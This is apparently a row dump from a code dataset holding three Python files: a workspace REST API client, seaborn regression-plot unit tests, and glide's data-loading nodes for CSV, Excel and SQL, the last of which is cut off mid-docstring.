hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k โ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 โ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 โ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k โ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 โ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 โ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k โ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 โ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 โ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
42b290f28379044f7898e5789570088ba9add498 | 5,974 | py | Python | pybricks/workspace.py | emthomas/pybricks | adc212cd8d8e9b257be3139aa99116ba2505ead6 | [
"MIT"
] | 2 | 2019-09-21T02:53:09.000Z | 2020-01-03T03:15:39.000Z | pybricks/workspace.py | emthomas/pybricks | adc212cd8d8e9b257be3139aa99116ba2505ead6 | [
"MIT"
] | null | null | null | pybricks/workspace.py | emthomas/pybricks | adc212cd8d8e9b257be3139aa99116ba2505ead6 | [
"MIT"
] | null | null | null | import json
import os
import requests
class WorkspaceApi(object):
"""The Workspace API"""
def __init__(self, hostname, token):
self.hostname = "%s/api/" % hostname
self.__headers = {'authorization': "Bearer %s" % token, "content-type": "application/scim+json",
"accept": "application/scim+json"}
def delete(self, path, recursive=False):
"""
Deletes an object or a directory (and optionally recursively deletes all objects in the directory).
If path does not exist, this call returns an error RESOURCE_DOES_NOT_EXIST.
If path is a non-empty directory and recursive is set to false, this call returns an error DIRECTORY_NOT_EMPTY.
Object deletion cannot be undone and deleting a directory recursively is not atomic.
:param path: The absolute path of the notebook or directory. This field is required.
:param recursive: The flag that specifies whether to delete the object recursively. It is false by default. Please note this deleting directory is not atomic. If it fails in the middle, some of objects under this directory may be deleted and cannot be undone.
:return: Json response
"""
endpoint = "2.0/workspace/delete"
url = "%s%s" % (self.hostname, endpoint)
data = json.dumps({'path': path, 'recursive': recursive})
req = requests.post(url, headers=self.__headers, data=data)
objects = req.json()
return objects
def export(self, path, path_format):
"""
Exports a notebook or contents of an entire directory. If path does not exist, this call returns an error RESOURCE_DOES_NOT_EXIST. One can only export a directory in DBC format. If the exported data would exceed size limit, this call returns an error MAX_NOTEBOOK_SIZE_EXCEEDED. This API does not support exporting a library.
:param path: The absolute path of the notebook or directory. Exporting directory is only support for DBC format. This field is required.
:param path_format: This specifies the format of the exported file. By default, this is SOURCE. However it may be one of: SOURCE, HTML, JUPYTER, DBC. The value is case sensitive.
:return:
"""
endpoint = "2.0/workspace/export"
url = "%s%s" % (self.hostname, endpoint)
params = {'path': path, 'format': path_format}
req = requests.get(url, headers=self.__headers, params=params)
objects = req.json()
return objects
def list(self, path, recursive=False):
"""
Lists the contents of a directory, or the object if it is not a directory.
If the input path does not exist, this call returns an error RESOURCE_DOES_NOT_EXIST
:param path: The absolute path of the notebook or directory. This field is required.
:param recursive: List recursively or not.
:return: an iterator
"""
endpoint = "2.0/workspace/list"
url = "%s%s" % (self.hostname, endpoint)
params = {'path': path}
req = requests.get(url, params=params, headers=self.__headers)
response = req.json()
if len(response) > 0:
objects = response['objects']
if not recursive:
for element in objects:
yield element
else:
for element in objects:
yield element
if element['object_type'] == 'DIRECTORY':
yield from self.list(element['path'], recursive)
def get_status(self, path):
"""
Gets the status of an object or a directory.
If path does not exist, this call returns an error RESOURCE_DOES_NOT_EXIST.
:param path: The absolute path of the notebook or directory. This field is required.
:return: Json response
"""
endpoint = "2.0/workspace/get-status"
url = "%s%s" % (self.hostname, endpoint)
params = {'path': path}
req = requests.get(url, headers=self.__headers, params=params)
objects = req.json()
return objects
def import_content(self, content, path, language, path_format="SOURCE", overwrite=True):
"""
Imports a notebook or the contents of an entire directory.
If path already exists and overwrite is set to false, this call returns an error RESOURCE_ALREADY_EXISTS.
One can only use DBC format to import a directory
:param content: The base64-encoded content. This has a limit of 10 MB.
:param path: The absolute path of the notebook or directory. Importing directory is only support for DBC format. This field is required.
:param language: The language. If format is set to SOURCE, this field is required; otherwise, it will be ignored
:param path_format: This specifies the format of the file to be imported. By default, this is SOURCE. However it may be one of: SOURCE, HTML, JUPYTER, DBC. The value is case sensitive.
:param overwrite: The flag that specifies whether to overwrite existing object. It is false by default.
:return: JSON response
"""
endpoint = "2.0/workspace/import"
url = "%s%s" % (self.hostname, endpoint)
filepath = os.path.dirname(path)
self.mkdirs(filepath)
data = json.dumps(
{'content': content, 'path': path, 'language': language, 'overwrite': overwrite, 'format': path_format})
req = requests.post(url, headers=self.__headers, data=data)
objects = req.json()
return objects
def mkdirs(self, path):
"""Creates the given directory and necessary parent directories if they do not exists"""
endpoint = "2.0/workspace/mkdirs"
url = "%s%s" % (self.hostname, endpoint)
data = json.dumps({'path': path})
req = requests.post(url, headers=self.__headers, data=data)
objects = req.json()
return objects
| 48.569106 | 333 | 0.647975 |
e0ec1944639ff07a6b0cbfc57042fad21e7d7ad5 | 19,452 | py | Python | seaborn/tests/test_linearmodels.py | darothen/seaborn | 0f43f2f9c84a6c677b7938a3e6edb66bbe9f8f88 | [
"MIT",
"BSD-3-Clause"
] | 1 | 2020-05-16T20:43:18.000Z | 2020-05-16T20:43:18.000Z | seaborn/tests/test_linearmodels.py | darothen/seaborn | 0f43f2f9c84a6c677b7938a3e6edb66bbe9f8f88 | [
"MIT",
"BSD-3-Clause"
] | null | null | null | seaborn/tests/test_linearmodels.py | darothen/seaborn | 0f43f2f9c84a6c677b7938a3e6edb66bbe9f8f88 | [
"MIT",
"BSD-3-Clause"
] | 3 | 2019-05-23T14:55:56.000Z | 2021-08-18T19:44:46.000Z | import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import pandas as pd
import nose.tools as nt
import numpy.testing as npt
import pandas.util.testing as pdt
from numpy.testing.decorators import skipif
from nose import SkipTest
try:
import statsmodels.regression.linear_model as smlm
_no_statsmodels = False
except ImportError:
_no_statsmodels = True
from . import PlotTestCase
from .. import linearmodels as lm
from .. import algorithms as algo
from .. import utils
from ..palettes import color_palette
rs = np.random.RandomState(0)
class TestLinearPlotter(PlotTestCase):
rs = np.random.RandomState(77)
df = pd.DataFrame(dict(x=rs.normal(size=60),
d=rs.randint(-2, 3, 60),
y=rs.gamma(4, size=60),
s=np.tile(list("abcdefghij"), 6)))
df["z"] = df.y + rs.randn(60)
df["y_na"] = df.y.copy()
df.loc[[10, 20, 30], 'y_na'] = np.nan
def test_establish_variables_from_frame(self):
p = lm._LinearPlotter()
p.establish_variables(self.df, x="x", y="y")
pdt.assert_series_equal(p.x, self.df.x)
pdt.assert_series_equal(p.y, self.df.y)
pdt.assert_frame_equal(p.data, self.df)
def test_establish_variables_from_series(self):
p = lm._LinearPlotter()
p.establish_variables(None, x=self.df.x, y=self.df.y)
pdt.assert_series_equal(p.x, self.df.x)
pdt.assert_series_equal(p.y, self.df.y)
nt.assert_is(p.data, None)
def test_establish_variables_from_array(self):
p = lm._LinearPlotter()
p.establish_variables(None,
x=self.df.x.values,
y=self.df.y.values)
npt.assert_array_equal(p.x, self.df.x)
npt.assert_array_equal(p.y, self.df.y)
nt.assert_is(p.data, None)
def test_establish_variables_from_mix(self):
p = lm._LinearPlotter()
p.establish_variables(self.df, x="x", y=self.df.y)
pdt.assert_series_equal(p.x, self.df.x)
pdt.assert_series_equal(p.y, self.df.y)
pdt.assert_frame_equal(p.data, self.df)
def test_establish_variables_from_bad(self):
p = lm._LinearPlotter()
with nt.assert_raises(ValueError):
p.establish_variables(None, x="x", y=self.df.y)
def test_dropna(self):
p = lm._LinearPlotter()
p.establish_variables(self.df, x="x", y_na="y_na")
pdt.assert_series_equal(p.x, self.df.x)
pdt.assert_series_equal(p.y_na, self.df.y_na)
p.dropna("x", "y_na")
mask = self.df.y_na.notnull()
pdt.assert_series_equal(p.x, self.df.x[mask])
pdt.assert_series_equal(p.y_na, self.df.y_na[mask])
class TestRegressionPlotter(PlotTestCase):
rs = np.random.RandomState(49)
grid = np.linspace(-3, 3, 30)
n_boot = 100
bins_numeric = 3
bins_given = [-1, 0, 1]
df = pd.DataFrame(dict(x=rs.normal(size=60),
d=rs.randint(-2, 3, 60),
y=rs.gamma(4, size=60),
s=np.tile(list(range(6)), 10)))
df["z"] = df.y + rs.randn(60)
df["y_na"] = df.y.copy()
bw_err = rs.randn(6)[df.s.values] * 2
df.y += bw_err
p = 1 / (1 + np.exp(-(df.x * 2 + rs.randn(60))))
df["c"] = [rs.binomial(1, p_i) for p_i in p]
df.loc[[10, 20, 30], 'y_na'] = np.nan
def test_variables_from_frame(self):
p = lm._RegressionPlotter("x", "y", data=self.df, units="s")
pdt.assert_series_equal(p.x, self.df.x)
pdt.assert_series_equal(p.y, self.df.y)
pdt.assert_series_equal(p.units, self.df.s)
pdt.assert_frame_equal(p.data, self.df)
def test_variables_from_series(self):
p = lm._RegressionPlotter(self.df.x, self.df.y, units=self.df.s)
npt.assert_array_equal(p.x, self.df.x)
npt.assert_array_equal(p.y, self.df.y)
npt.assert_array_equal(p.units, self.df.s)
nt.assert_is(p.data, None)
def test_variables_from_mix(self):
p = lm._RegressionPlotter("x", self.df.y + 1, data=self.df)
npt.assert_array_equal(p.x, self.df.x)
npt.assert_array_equal(p.y, self.df.y + 1)
pdt.assert_frame_equal(p.data, self.df)
def test_dropna(self):
p = lm._RegressionPlotter("x", "y_na", data=self.df)
nt.assert_equal(len(p.x), pd.notnull(self.df.y_na).sum())
p = lm._RegressionPlotter("x", "y_na", data=self.df, dropna=False)
nt.assert_equal(len(p.x), len(self.df.y_na))
def test_ci(self):
p = lm._RegressionPlotter("x", "y", data=self.df, ci=95)
nt.assert_equal(p.ci, 95)
nt.assert_equal(p.x_ci, 95)
p = lm._RegressionPlotter("x", "y", data=self.df, ci=95, x_ci=68)
nt.assert_equal(p.ci, 95)
nt.assert_equal(p.x_ci, 68)
@skipif(_no_statsmodels)
def test_fast_regression(self):
p = lm._RegressionPlotter("x", "y", data=self.df, n_boot=self.n_boot)
# Fit with the "fast" function, which just does linear algebra
yhat_fast, _ = p.fit_fast(self.grid)
# Fit using the statsmodels function with an OLS model
yhat_smod, _ = p.fit_statsmodels(self.grid, smlm.OLS)
# Compare the vector of y_hat values
npt.assert_array_almost_equal(yhat_fast, yhat_smod)
@skipif(_no_statsmodels)
def test_regress_poly(self):
p = lm._RegressionPlotter("x", "y", data=self.df, n_boot=self.n_boot)
# Fit an first-order polynomial
yhat_poly, _ = p.fit_poly(self.grid, 1)
# Fit using the statsmodels function with an OLS model
yhat_smod, _ = p.fit_statsmodels(self.grid, smlm.OLS)
# Compare the vector of y_hat values
npt.assert_array_almost_equal(yhat_poly, yhat_smod)
def test_regress_logx(self):
x = np.arange(1, 10)
y = np.arange(1, 10)
grid = np.linspace(1, 10, 100)
p = lm._RegressionPlotter(x, y, n_boot=self.n_boot)
yhat_lin, _ = p.fit_fast(grid)
yhat_log, _ = p.fit_logx(grid)
nt.assert_greater(yhat_lin[0], yhat_log[0])
nt.assert_greater(yhat_log[20], yhat_lin[20])
nt.assert_greater(yhat_lin[90], yhat_log[90])
@skipif(_no_statsmodels)
def test_regress_n_boot(self):
p = lm._RegressionPlotter("x", "y", data=self.df, n_boot=self.n_boot)
# Fast (linear algebra) version
_, boots_fast = p.fit_fast(self.grid)
npt.assert_equal(boots_fast.shape, (self.n_boot, self.grid.size))
# Slower (np.polyfit) version
_, boots_poly = p.fit_poly(self.grid, 1)
npt.assert_equal(boots_poly.shape, (self.n_boot, self.grid.size))
# Slowest (statsmodels) version
_, boots_smod = p.fit_statsmodels(self.grid, smlm.OLS)
npt.assert_equal(boots_smod.shape, (self.n_boot, self.grid.size))
@skipif(_no_statsmodels)
def test_regress_without_bootstrap(self):
p = lm._RegressionPlotter("x", "y", data=self.df,
n_boot=self.n_boot, ci=None)
# Fast (linear algebra) version
_, boots_fast = p.fit_fast(self.grid)
nt.assert_is(boots_fast, None)
# Slower (np.polyfit) version
_, boots_poly = p.fit_poly(self.grid, 1)
nt.assert_is(boots_poly, None)
# Slowest (statsmodels) version
_, boots_smod = p.fit_statsmodels(self.grid, smlm.OLS)
nt.assert_is(boots_smod, None)
def test_numeric_bins(self):
p = lm._RegressionPlotter(self.df.x, self.df.y)
x_binned, bins = p.bin_predictor(self.bins_numeric)
npt.assert_equal(len(bins), self.bins_numeric)
npt.assert_array_equal(np.unique(x_binned), bins)
def test_provided_bins(self):
p = lm._RegressionPlotter(self.df.x, self.df.y)
x_binned, bins = p.bin_predictor(self.bins_given)
npt.assert_array_equal(np.unique(x_binned), self.bins_given)
def test_bin_results(self):
p = lm._RegressionPlotter(self.df.x, self.df.y)
x_binned, bins = p.bin_predictor(self.bins_given)
nt.assert_greater(self.df.x[x_binned == 0].min(),
self.df.x[x_binned == -1].max())
nt.assert_greater(self.df.x[x_binned == 1].min(),
self.df.x[x_binned == 0].max())
def test_scatter_data(self):
p = lm._RegressionPlotter(self.df.x, self.df.y)
x, y = p.scatter_data
npt.assert_array_equal(x, self.df.x)
npt.assert_array_equal(y, self.df.y)
p = lm._RegressionPlotter(self.df.d, self.df.y)
x, y = p.scatter_data
npt.assert_array_equal(x, self.df.d)
npt.assert_array_equal(y, self.df.y)
p = lm._RegressionPlotter(self.df.d, self.df.y, x_jitter=.1)
x, y = p.scatter_data
nt.assert_true((x != self.df.d).any())
npt.assert_array_less(np.abs(self.df.d - x), np.repeat(.1, len(x)))
npt.assert_array_equal(y, self.df.y)
p = lm._RegressionPlotter(self.df.d, self.df.y, y_jitter=.05)
x, y = p.scatter_data
npt.assert_array_equal(x, self.df.d)
npt.assert_array_less(np.abs(self.df.y - y), np.repeat(.1, len(y)))
def test_estimate_data(self):
p = lm._RegressionPlotter(self.df.d, self.df.y, x_estimator=np.mean)
x, y, ci = p.estimate_data
npt.assert_array_equal(x, np.sort(np.unique(self.df.d)))
npt.assert_array_almost_equal(y, self.df.groupby("d").y.mean())
npt.assert_array_less(np.array(ci)[:, 0], y)
npt.assert_array_less(y, np.array(ci)[:, 1])
def test_estimate_cis(self):
# set known good seed to avoid the test stochastically failing
np.random.seed(123)
p = lm._RegressionPlotter(self.df.d, self.df.y,
x_estimator=np.mean, ci=95)
_, _, ci_big = p.estimate_data
p = lm._RegressionPlotter(self.df.d, self.df.y,
x_estimator=np.mean, ci=50)
_, _, ci_wee = p.estimate_data
npt.assert_array_less(np.diff(ci_wee), np.diff(ci_big))
p = lm._RegressionPlotter(self.df.d, self.df.y,
x_estimator=np.mean, ci=None)
_, _, ci_nil = p.estimate_data
npt.assert_array_equal(ci_nil, [None] * len(ci_nil))
def test_estimate_units(self):
# Seed the RNG locally
np.random.seed(345)
p = lm._RegressionPlotter("x", "y", data=self.df,
units="s", x_bins=3)
_, _, ci_big = p.estimate_data
ci_big = np.diff(ci_big, axis=1)
p = lm._RegressionPlotter("x", "y", data=self.df, x_bins=3)
_, _, ci_wee = p.estimate_data
ci_wee = np.diff(ci_wee, axis=1)
npt.assert_array_less(ci_wee, ci_big)
def test_partial(self):
x = self.rs.randn(100)
y = x + self.rs.randn(100)
z = x + self.rs.randn(100)
p = lm._RegressionPlotter(y, z)
_, r_orig = np.corrcoef(p.x, p.y)[0]
p = lm._RegressionPlotter(y, z, y_partial=x)
_, r_semipartial = np.corrcoef(p.x, p.y)[0]
nt.assert_less(r_semipartial, r_orig)
p = lm._RegressionPlotter(y, z, x_partial=x, y_partial=x)
_, r_partial = np.corrcoef(p.x, p.y)[0]
nt.assert_less(r_partial, r_orig)
@skipif(_no_statsmodels)
def test_logistic_regression(self):
p = lm._RegressionPlotter("x", "c", data=self.df,
logistic=True, n_boot=self.n_boot)
_, yhat, _ = p.fit_regression(x_range=(-3, 3))
npt.assert_array_less(yhat, 1)
npt.assert_array_less(0, yhat)
@skipif(_no_statsmodels)
def test_logistic_perfect_separation(self):
y = self.df.x > self.df.x.mean()
p = lm._RegressionPlotter("x", y, data=self.df,
logistic=True, n_boot=10)
_, yhat, _ = p.fit_regression(x_range=(-3, 3))
nt.assert_true(np.isnan(yhat).all())
@skipif(_no_statsmodels)
def test_robust_regression(self):
p_ols = lm._RegressionPlotter("x", "y", data=self.df,
n_boot=self.n_boot)
_, ols_yhat, _ = p_ols.fit_regression(x_range=(-3, 3))
p_robust = lm._RegressionPlotter("x", "y", data=self.df,
robust=True, n_boot=self.n_boot)
_, robust_yhat, _ = p_robust.fit_regression(x_range=(-3, 3))
nt.assert_equal(len(ols_yhat), len(robust_yhat))
@skipif(_no_statsmodels)
def test_lowess_regression(self):
p = lm._RegressionPlotter("x", "y", data=self.df, lowess=True)
grid, yhat, err_bands = p.fit_regression(x_range=(-3, 3))
nt.assert_equal(len(grid), len(yhat))
nt.assert_is(err_bands, None)
def test_regression_options(self):
with nt.assert_raises(ValueError):
lm._RegressionPlotter("x", "y", data=self.df,
lowess=True, order=2)
with nt.assert_raises(ValueError):
lm._RegressionPlotter("x", "y", data=self.df,
lowess=True, logistic=True)
def test_regression_limits(self):
f, ax = plt.subplots()
ax.scatter(self.df.x, self.df.y)
p = lm._RegressionPlotter("x", "y", data=self.df)
grid, _, _ = p.fit_regression(ax)
xlim = ax.get_xlim()
nt.assert_equal(grid.min(), xlim[0])
nt.assert_equal(grid.max(), xlim[1])
p = lm._RegressionPlotter("x", "y", data=self.df, truncate=True)
grid, _, _ = p.fit_regression()
nt.assert_equal(grid.min(), self.df.x.min())
nt.assert_equal(grid.max(), self.df.x.max())
class TestRegressionPlots(PlotTestCase):
rs = np.random.RandomState(56)
df = pd.DataFrame(dict(x=rs.randn(90),
y=rs.randn(90) + 5,
z=rs.randint(0, 1, 90),
g=np.repeat(list("abc"), 30),
h=np.tile(list("xy"), 45),
u=np.tile(np.arange(6), 15)))
bw_err = rs.randn(6)[df.u.values]
df.y += bw_err
def test_regplot_basic(self):
f, ax = plt.subplots()
lm.regplot("x", "y", self.df)
nt.assert_equal(len(ax.lines), 1)
nt.assert_equal(len(ax.collections), 2)
x, y = ax.collections[0].get_offsets().T
npt.assert_array_equal(x, self.df.x)
npt.assert_array_equal(y, self.df.y)
def test_regplot_selective(self):
f, ax = plt.subplots()
ax = lm.regplot("x", "y", self.df, scatter=False, ax=ax)
nt.assert_equal(len(ax.lines), 1)
nt.assert_equal(len(ax.collections), 1)
ax.clear()
f, ax = plt.subplots()
ax = lm.regplot("x", "y", self.df, fit_reg=False)
nt.assert_equal(len(ax.lines), 0)
nt.assert_equal(len(ax.collections), 1)
ax.clear()
f, ax = plt.subplots()
ax = lm.regplot("x", "y", self.df, ci=None)
nt.assert_equal(len(ax.lines), 1)
nt.assert_equal(len(ax.collections), 1)
ax.clear()
def test_regplot_scatter_kws_alpha(self):
f, ax = plt.subplots()
color = np.array([[0.3, 0.8, 0.5, 0.5]])
ax = lm.regplot("x", "y", self.df, scatter_kws={'color': color})
nt.assert_is(ax.collections[0]._alpha, None)
nt.assert_equal(ax.collections[0]._facecolors[0, 3], 0.5)
f, ax = plt.subplots()
color = np.array([[0.3, 0.8, 0.5]])
ax = lm.regplot("x", "y", self.df, scatter_kws={'color': color})
nt.assert_equal(ax.collections[0]._alpha, 0.8)
f, ax = plt.subplots()
color = np.array([[0.3, 0.8, 0.5]])
ax = lm.regplot("x", "y", self.df, scatter_kws={'color': color,
'alpha': 0.4})
nt.assert_equal(ax.collections[0]._alpha, 0.4)
f, ax = plt.subplots()
color = 'r'
ax = lm.regplot("x", "y", self.df, scatter_kws={'color': color})
nt.assert_equal(ax.collections[0]._alpha, 0.8)
def test_regplot_binned(self):
ax = lm.regplot("x", "y", self.df, x_bins=5)
nt.assert_equal(len(ax.lines), 6)
nt.assert_equal(len(ax.collections), 2)
def test_lmplot_basic(self):
g = lm.lmplot("x", "y", self.df)
ax = g.axes[0, 0]
nt.assert_equal(len(ax.lines), 1)
nt.assert_equal(len(ax.collections), 2)
x, y = ax.collections[0].get_offsets().T
npt.assert_array_equal(x, self.df.x)
npt.assert_array_equal(y, self.df.y)
def test_lmplot_hue(self):
g = lm.lmplot("x", "y", data=self.df, hue="h")
ax = g.axes[0, 0]
nt.assert_equal(len(ax.lines), 2)
nt.assert_equal(len(ax.collections), 4)
def test_lmplot_markers(self):
g1 = lm.lmplot("x", "y", data=self.df, hue="h", markers="s")
nt.assert_equal(g1.hue_kws, {"marker": ["s", "s"]})
g2 = lm.lmplot("x", "y", data=self.df, hue="h", markers=["o", "s"])
nt.assert_equal(g2.hue_kws, {"marker": ["o", "s"]})
with nt.assert_raises(ValueError):
lm.lmplot("x", "y", data=self.df, hue="h", markers=["o", "s", "d"])
def test_lmplot_marker_linewidths(self):
if mpl.__version__ == "1.4.2":
raise SkipTest
g = lm.lmplot("x", "y", data=self.df, hue="h",
fit_reg=False, markers=["o", "+"])
c = g.axes[0, 0].collections
nt.assert_equal(c[0].get_linewidths()[0], 0)
rclw = mpl.rcParams["lines.linewidth"]
nt.assert_equal(c[1].get_linewidths()[0], rclw)
def test_lmplot_facets(self):
g = lm.lmplot("x", "y", data=self.df, row="g", col="h")
nt.assert_equal(g.axes.shape, (3, 2))
g = lm.lmplot("x", "y", data=self.df, col="u", col_wrap=4)
nt.assert_equal(g.axes.shape, (6,))
g = lm.lmplot("x", "y", data=self.df, hue="h", col="u")
nt.assert_equal(g.axes.shape, (1, 6))
def test_lmplot_hue_col_nolegend(self):
g = lm.lmplot("x", "y", data=self.df, col="h", hue="h")
nt.assert_is(g._legend, None)
def test_lmplot_scatter_kws(self):
g = lm.lmplot("x", "y", hue="h", data=self.df, ci=None)
red_scatter, blue_scatter = g.axes[0, 0].collections
red, blue = color_palette(n_colors=2)
npt.assert_array_equal(red, red_scatter.get_facecolors()[0, :3])
npt.assert_array_equal(blue, blue_scatter.get_facecolors()[0, :3])
def test_residplot(self):
x, y = self.df.x, self.df.y
ax = lm.residplot(x, y)
resid = y - np.polyval(np.polyfit(x, y, 1), x)
x_plot, y_plot = ax.collections[0].get_offsets().T
npt.assert_array_equal(x, x_plot)
npt.assert_array_almost_equal(resid, y_plot)
@skipif(_no_statsmodels)
def test_residplot_lowess(self):
ax = lm.residplot("x", "y", self.df, lowess=True)
nt.assert_equal(len(ax.lines), 2)
x, y = ax.lines[1].get_xydata().T
npt.assert_array_equal(x, np.sort(self.df.x))
def test_three_point_colors(self):
x, y = np.random.randn(2, 3)
ax = lm.regplot(x, y, color=(1, 0, 0))
color = ax.collections[0].get_facecolors()
npt.assert_almost_equal(color[0, :3],
(1, 0, 0))
| 33.770833 | 79 | 0.587189 |
27fc3f84ea8938d34c14f1510abcffd71d007b60 | 19,214 | py | Python | glide/load.py | LemontechSA/glide | a84ec1b9c8a982430308e8b0a04f84f26200765c | [
"MIT"
] | 19 | 2019-09-09T18:51:26.000Z | 2021-11-23T21:15:37.000Z | glide/load.py | LemontechSA/glide | a84ec1b9c8a982430308e8b0a04f84f26200765c | [
"MIT"
] | null | null | null | glide/load.py | LemontechSA/glide | a84ec1b9c8a982430308e8b0a04f84f26200765c | [
"MIT"
] | 4 | 2019-12-01T22:40:04.000Z | 2022-03-23T18:06:52.000Z | """A home for common data load nodes"""
from copy import deepcopy
import csv
from email.message import EmailMessage
import shutil
import sqlite3
import tempfile
import requests
from tlbx import st, pp, create_email, send_email, sqlformat, repr, format_msg
from glide.core import Node
from glide.flow import SkipFalseNode
from glide.sql import SQLNode
from glide.sql_utils import get_temp_table, add_table_suffix, escape_string
from glide.utils import (
dbg,
warn,
raiseif,
raiseifnot,
size,
save_excel,
find_class_in_dict,
get_class_list_docstring,
open_filepath_or_buffer,
)
class Print(Node):
"""Print the data"""
def print(self, data):
"""Print the data"""
print(data)
def get_label(self):
"""Get a label for the print statement"""
return "---- %s ----\n" % self.name
def run(self, data, label=True):
"""Print the data with the printer function and push"""
if label:
print(self.get_label(), end="")
self.print(data)
self.push(data)
class PrettyPrint(Print):
"""Pretty-prints the data"""
def print(self, data):
pp(data)
class LenPrint(Print):
"""Prints the length of the data"""
def get_label(self):
return "%s: " % self.name
def print(self, data):
print("data length: %s" % size(data, "n/a"))
class ReprPrint(Print):
"""Prints the reprlib.repr of the data"""
def print(self, data):
print(repr(data))
class FormatPrint(Node):
"""Format and print the data"""
def run(
self,
data,
label=None,
indent=None,
color=None,
autocolor=False,
format_func="pf",
):
"""Format using tlx.format_msg, then print
Parameters
----------
data
The data to print
**kwargs
Keyword arguments passed to tlx.format_msg
"""
if label == "node":
label = self.name
msg = format_msg(
data,
label=label,
indent=indent,
color=color,
autocolor=autocolor,
format_func=format_func,
)
print(msg)
self.push(data)
class CSVLoad(SkipFalseNode):
"""Load data into a CSV using DictWriter"""
def begin(self):
"""Initialize state for CSV writing"""
self.writer = None
def run(self, rows, f, push_file=False, dry_run=False, **kwargs):
"""Use DictWriter to output dict rows to a CSV.
Parameters
----------
rows
Iterable of rows to load to a CSV
f : file or buffer
File to write rows to
push_file : bool, optional
If true, push the file forward instead of the data
dry_run : bool, optional
If true, skip actually loading the data
**kwargs
Keyword arguments passed to csv.DictWriter
"""
close = False
fo = f
if isinstance(f, str):
fo = open(f, "w")
close = True
try:
if dry_run:
warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
else:
if not self.writer:
if not kwargs.get("fieldnames", None):
try:
kwargs["fieldnames"] = rows[0].keys()
except TypeError as e:
raise TypeError(
"Unable to determine fieldnames from rows. "
"Either specify fieldnames or pass subscriptable data rows with keys()."
)
self.writer = csv.DictWriter(fo, **kwargs)
self.writer.writeheader()
self.writer.writerows(rows)
finally:
if close:
fo.close()
if push_file:
self.push(f)
else:
self.push(rows)
def end(self):
"""Reset state in case the node gets reused"""
self.writer = None
class ExcelLoad(SkipFalseNode):
"""Load data into an Excel file using pyexcel"""
def run(
self,
rows,
f,
dict_rows=False,
sheet_name="Sheet1",
push_file=False,
dry_run=False,
**kwargs
):
"""Use DictWriter to output dict rows to a CSV.
Parameters
----------
rows
Iterable of rows to load to an Excel file, or a dict of
sheet_name->iterable for multi-sheet loads.
f : file or buffer
File to write rows to
dict_rows : bool, optional
If true the rows of each sheet will be converted from dicts to lists
sheet_name : str, optional
Sheet name to use if input is an iterable of rows. Unused otherwise.
push_file : bool, optional
If true, push the file forward instead of the data
dry_run : bool, optional
If true, skip actually loading the data
**kwargs
Keyword arguments passed to pyexcel
"""
data = rows
if not isinstance(rows, dict):
# Setup as a single sheet
data = {sheet_name: rows}
if dict_rows:
for _sheet_name, sheet_data in data.items():
header = [list(sheet_data[0].keys())]
data[_sheet_name] = header + [list(x.values()) for x in sheet_data]
if dry_run:
warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
else:
save_excel(f, data, **kwargs)
if push_file:
self.push(f)
else:
self.push(rows)
class SQLLoad(SQLNode):
"""Generic SQL loader"""
def run(
self,
rows,
conn,
table,
cursor=None,
commit=True,
rollback=False,
stmt_type="REPLACE",
odku=False,
swap=False,
keep_old=False,
push_data=False,
dry_run=False,
):
"""Form SQL statement and use bulk execute to write rows to table
Parameters
----------
rows
Iterable of rows to load to the table
conn
Database connection
table : str
Name of a table to write the data to
cursor : optional
Database connection cursor
commit : bool, optional
If true try to commit the transaction. If your connection
autocommits this will have no effect. If this is a SQLAlchemy
connection and you are in a transaction, it will try to get a
reference to the current transaction and call commit on that.
rollback : bool, optional
If true try to rollback the transaction on exceptions. Behavior
may vary by backend DB library if you are not currently in a
transaction.
stmt_type : str, optional
Type of SQL statement to use (REPLACE, INSERT, etc.). **Note:** Backend
support for this varies.
odku : bool or list, optional
If true, add ON DUPLICATE KEY UPDATE clause for all columns. If a
list then only add it for the specified columns. **Note:** Backend
support for this varies.
swap : bool, optional
If true, load a table and then swap it into the target table via rename.
Not supported with all database back ends.
keep_old : bool, optional
If true and swapping tables, keep the original table with a __old
suffix added to the name
push_data : bool, optional
If true, push the data forward instead of the table name
dry_run : bool, optional
If true, skip actually loading the data
"""
load_table = table
if swap:
load_table = add_table_suffix(table, "__swap")
sql = self.get_bulk_statement(conn, stmt_type, load_table, rows, odku=odku)
dbg("Loading %d rows\n%s" % (size(rows, "n/a"), sqlformat(sql)), indent="label")
if dry_run:
warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
else:
if not cursor:
cursor = self.get_sql_executor(conn)
try:
if swap:
self.create_like(conn, cursor, load_table, table, drop=True)
self.executemany(conn, cursor, sql, rows)
if swap:
old_table = add_table_suffix(table, "__old")
self.rename_tables(
conn, cursor, [(table, old_table), (load_table, table)]
)
if not keep_old:
self.drop_table(conn, cursor, old_table)
if commit:
self.commit(conn)
except:
if rollback:
self.rollback(conn)
raise
if push_data:
self.push(rows)
else:
self.push(table)
class SQLTempLoad(SQLNode):
"""Generic SQL temp table loader"""
def run(
self,
rows,
conn,
cursor=None,
schema=None,
commit=True,
rollback=False,
dry_run=False,
):
"""Create and bulk load a temp table
Parameters
----------
rows
Iterable of rows to load to the table
conn
Database connection
cursor : optional
Database connection cursor
schema : str, optional
Schema to create temp table in
commit : bool, optional
If true try to commit the transaction. If your connection
